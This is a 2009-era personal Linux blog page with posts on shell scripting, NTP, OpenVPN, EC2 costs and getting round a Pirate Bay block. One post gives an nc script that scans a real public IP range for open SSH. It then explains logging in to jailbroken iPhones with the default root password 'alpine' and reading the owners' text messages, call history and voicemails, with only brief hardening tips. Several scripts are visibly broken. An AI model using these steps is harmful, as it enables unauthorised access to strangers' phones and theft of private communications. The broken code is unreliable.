Adventures in Red Hat Enterprise Linux, CentOS, Fedora, OpenBSD and other open source solutions.

Aesthetics of shell scripting

Here is the problem; you need to print a single line filled with dashes. Will you just echo 80 dashes or write a beautiful loop for it?

The ease solution

$ echo "--------------------------------------------------------------------------------"

The aesthetic solution

$ n=0 ; while [ $n -lt 80 ] ; do printf "-" ; n=$(($n+1)) ; done ; echo

Both give the same result, but the easy solution is faster. Result from the machine where I am working on:

Test Easy way Aesthetics way
Time to execute: 0.000 seconds 0.039 seconds
Bytes on disk 88 70
Complexity level 1 7
System calls 37 657
lines printed in 1 minute 1471371 18318

The numbers show that simplicity is more efficient.

Prepare your Linux box for Daylight Saving Time (summer or winter time)

The summertime is starting soon. What can you do on your Linux machine to be prepared for Daylight Saving Time?

The bad news

Time is a very complicated matter; it shifts every half year, there are leap years and seconds, some countries change the start or end date of summertime, many countries have multiple timezones, some servers can be in one zone while the users can be in a different zone, and so on.
All the timezone information is stored in /usr/share/zoneinfo. The directories and files in there are definitions of what the displayed time should be. The displayed time is based on Coordinated Universal Time (UTC) adjusted to the rules listed in a timezone file in /usr/share/zoneinfo.
To modify the timezone for your computer; copy a timezone file to /etc/localtime. For example to set the timezone to Europe/Amsterdam:

# cp /usr/share/zoneinfo/Europe/Amsterdam /etc/localtime

Chances are that your distribution has a tool available to help you. Use it; it's likely easier. Fedora uses a tool called system-config-time to manage time and timezones.

The good news

Most likely your Linux box is already prepared for DST. Above all that, Network Time Protocol (NTP) is so extremely easy to use, that syncing your time is no problem at all. To be prepared for DST, use NTP and update all packages on your Fedora machine like this:

# yum update
# yum install ntp
# service ntpd start
# chkconfig ntpd on

For any other distribution; update you system, install ntp and start it.

Google Apps problems

There seem to be some problems with Google Apps since approximately 11:00 CET on 24th of februari 2009. When you are trying to login, you'll get an error like this:

Server Error
The server encountered a temporary error and could not complete your request.

Please try again in 30 seconds.

The title bar reads:

502 Server Error

The issue is discussed in The Google support forum. Meanwhile, we will wait for Google Apps to be available again...

Update: The problem seems to be fixed! (14:00 CET)

Using SSH instead of SCP

Using the program SCP is not needed, use this scipt to use SSH for transferring files:

$ ssh [email protected] "cat /remote/file" > /local/file

To use this trick in a shell script-wrapper:

$ cat
#!/bin/sh -x

host=$(echo "$1" | cut [email protected] -f2 | cut -d: -f1)
user=$(echo "$1" | cut [email protected] -f1)
remotefile=$(echo "$1" | cut -d: -f2)

if [ ! "$host" -o ! "$user" -o ! "$remotefile" -o ! "$localfile ] ; then
echo "Please use all requires options, for example:"
echo "$0 [email protected]:./file ."
exit 1

ssh $host "cat $remotefile" > $localfile
$ chmod 755

Now "replace" the normal SCP by using an alias:

$ alias scp="~/"

One flaw of this script is that all options will have to be configured statically in .ssh/config.

Howto access iPhones remotely using OpenSSH

A jail broken Apple iPhone with OpenSSH installed is accessible over the internet using ssh and the default root password "alpine".

You can use a short script to find IP addresses that have port 22 open and try to login. You can run this script from your Mac or any Linux machine.



mkdir -p /tmp/scan-iphones/open
mkdir /tmp/scan-iphones/closed

while [ "$third" -lt 192 ] ; do
while [ "$fourth" -lt 255 ] ; do
  if [ ! -f /tmp/scan-iphones/94.157."$third"."$fourth" ] ; then
   if [ ! -f /tmp/scan-iphones/open/94.157."$third"."$fourth" ] ; then
    if [ ! -f /tmp/scan-iphones/closed/94.157."$third"."$fourth" ] ; then
     if [ -f /tmp/scan-iphones/stop ] ; then
      echo "Stopping because /tmp/scan-iphone/stop exists."
      exit 1
     touch /tmp/scan-iphones/94.157."$third"."$fourth"
     nc -w 1 -z 94.157."$third"."$fourth" 22-22 > /dev/null 2>&1 && touch /tmp/scan-iphones/open/94.157."$third"."$fourth" || touch /tmp/scan-iphones/closed/94.157."$third"."$fourth"
     rm /tmp/scan-iphones/94.157."$third"."$fourth"

The IP-addresses of IP-addresses that have port 22 open are stored in /tmp/scan-iphones/open/*. Some of these IP-addresses are not iPhones, so not every IP-address listed there are vulnerable. To stop the script press [CTRL]+[c] or type touch /tmp/scan-iphones/stop.

Now that you have IP addresses where you can login, use one of these "features":

Read all text messages

From your Mac or any Linux machine, type:

$ ssh [email protected]
# sqlite3 /private/var/mobile/Library/SMS/sms.db
SELECT * FROM message;

See the call history

From your Mac or any Linux machine, type:
$ ssh [email protected]
# sqlite3 /private/var/mobile/Library/CallHistory/call_history.db

Listen to voicemails

From your Mac or any Linux machine, type:

$ scp [email protected]:/private/var/mobile/Library/Voicemail/*.amr .

Open the finder, drag the .amr files on Quicktime to listen to them.

To secure your iPhone, you can use one or more of these measures:

  • Change the "root" password - On the Terminal, type # passwd.
  • Change the "mobile" password - On the Terminal, type # passwd mobile.
  • Disable OpenSSH start at boot time - Don't know how to do this yet.
  • Stop OpenSSH for now - launchctl load -w /Library/LaunchDaemons/com.openssh.sshd.plist.
  • Set "PermitRootLogin" to "No" - in /private/etc/ssh/sshd_config.
  • If all fails: Uninstall OpenSSH - Using the tools that installed OpenSSH.

Converting the weeknumber to a date and reversed in Linux

I hate it when people use week numbers, like "week 34". Week numbers are mostly not printed on any calendar or schedule. So; here is how to convert a date to a week number and a weeknumber to a date.

Converting the current date to a week number

This is an easy one, because the man page of date simply explains: %U - Displays week of the year(Sunday as the first day of the week) as a decimal number[00 - 53] . All days in a new year preceding the first Sunday are considered to be in week 0.

$ date +'%U'

Converting a specific date to a week number

A little harder, that why you don't have to figure it out yourself, just copy-paste and replace to meet your requirements:

$ date +'%U' 2009-10-2

Converting a week number to a specific date

This is not an easy one and requires a very nasty trick. To get a day in week 23 for example, use this command:

$ date --date="$(((23-$(date +'%U'))*7)) days"
Mon Jun 8 12:11:40 WEDT 2009

(See that 23 is the week number you'd like to get a date from.)

Help Denmark - how to connect to The Pirate Bay

We all love The Pirate Bay, I guess the Danish people do too.

Now that The Pirate Bay is blocked for Danish people, here is a recipe for connecting to The Pirate Bay after all.

UPDATE: Simply visit The Pirate Bay through Me in IT Consultancy.

1. Use a web-proxy in some other country.

This is a very simple trick. Go to either Proxify, Zend2, or any other anonymous proxy and enter

2. Use a proxy in some other country.

Find yourself an open proxy in any country but Denmark.
This trick is a little harder, because it's not very easy to find a working open proxy and the proxies that are open tend to be shutdown or closed sooner or later.

3. Setup an SSH-tunnel via some other country.

This is an even more difficult trick, but works rather stable. It requires your to have access to a Linux or UNIX box somewhere outside Denmark.
Using OpenSSH:

$ ssh -L

When that's successful; visit http://localhost:8080 from your web browser.

Using Putty:

  1. Open Putty. We are going to make a new profile, so be sure to save it.
  2. Fill in the "Host name (or IP address)". This is the (free account on a) machine your are connecting to outside Denmark.
  3. Click "Connection" - "SSH" - "Tunnels".
  4. The source port is the entry of the tunnel, use "8080" for example.
  5. The destination is where the tunnel is sent to. Set it to
  6. Click "Add". Be sure to save this session, so you don't have to type this all again.
  7. Click "Open" to start the connection and the tunnel.

When that's successful; visit http://localhost:8080 from your web browser.

Good luck on you!

One month of Amazon Elastic Compute Cloud

It's been one month (23 days) since I move to Amazons EC2, aka Amazon Cloud, aka AWS. Overall I am very pleased with the performance of my instance, which I use as a webserver. Also the extra volumes perform great. It's been up for 100% in Januari 2009.

Here are some numbers so you can get an estimate of what Amazon EC2 cost:

$0.11 per Small Instance (m1.small) instance-hour (or partial hour) 537 Hrs $59.07
$0.100 per GB Internet Data Transfer - all data transfer into Amazon EC2 22.554 GB $2.26
$0.170 per GB Internet Data Transfer - first 10 TB / month data transfer out of Amazon EC2 32.379 GB $5.50
$0.010 per GB Regional Data Transfer - in/out between Availability Zones or when using public IP or Elastic IP addresses 0.023 GB $0.01
$0.12 per GB-month of provisioned storage 23.073 Count $2.77
$0.11 per 1 million I/O requests 4,398,873 Count $0.48
Total $70.09

Overall I'd recommend Amazon EC2, but it's a little more expensive than an average Private Hosting plan, but this setup is more scalable.

If you're interested in high quality Amazon elastic cloud, use Newvem's AWS Support to achieve your goals.

Determining the quality of a Dutch contracting company

As a freelancer in Dutch IT, you will almost always use a contracting company. This company makes an initial contact with the end-customer and receives and pays your invoices.

When you are in contact with a new contracting company, you can check IT Bemiddelaars to see what a company has done before, compare rates and cost.

When you would like to review an "IT bemiddelaar", please go to IT Bemiddelaars to enter the information you'd like to share.

Setting up an OpenVPN server and clients on Fedora Core

Besides the extensive OpenVPN documentation I couldn't really find a step by step guide on how to setup an OpenVPN server and client.

I want to be able to connect my Fedora Core 10 laptop to the home-network via a Fedora Core 10 server.

Overview of the network setup

The server is, running Fedora Core 10 with openvpn 2.1. Newer versions are likely to work as well.
The laptop has a dynamic IP address.

Setting up the server

Please read the OpenVPN documentation if you run into troubles.

First setup the Certificate Authority keys.

cd /usr/share/openvpn/easy-rsa/2.0/
vi vars
# Fill KEY_COUNTRY, KEY_PROVINCE, KEY_CITY, KEY_ORG, and KEY_EMAIL, all at the bottom.
. ./vars
# Press "enter" on each item.

Now setup the Server key and the Diffie Hellman key.

./build-key-server server
# Press enter on each item.

And build the client keys, each client needs its own key, with a unique Common Name. The IP address assigned to the client is related to the Common Name, so if you use non-unique Common Names, you will have conflicting IP addresses.

./build-key client1
./build-key client2
./build-key client3
mv keys /etc/openvpn

cp /usr/share/doc/openvpn-2.1/sample-config-files/roadwarrior-server.conf /etc/openvpn/server.conf
vi /etc/openvpn/server.conf
# Check the ca, cert, key and dh variables.

Start the server by issuing:

chkconfig openvpn on
service openvpn start

Setting up the client

Move the ca.cert, client1.crt and client1.key to the client, in /etc/openvpn/keys and copy the configuration. You will need to modify the client.conf a little bit.

/usr/share/doc/openvpn-2.1/sample-config-files/roadwarrior-client.conf /etc/openvpn/client.conf
vi /etc/openvpn/client.conf
# Find "remote" and set it to the internet address of your VPN server.

Start the client:

chkconfig openvpn on
service openvpn start

Checking if it worked

On both server and client issue ifconfig tun0 to see what IP-address is assigned to the entry of the tunnel. From the either end of the tunnel you should be able to ping the other end. Also tcpdump -n -i tun0 should work.

Hope this works for you as well, check out /var/log/messages for information. /etc/init.d/openvpn status dump a status of all connected clients to /var/log/messages.

Syndicate content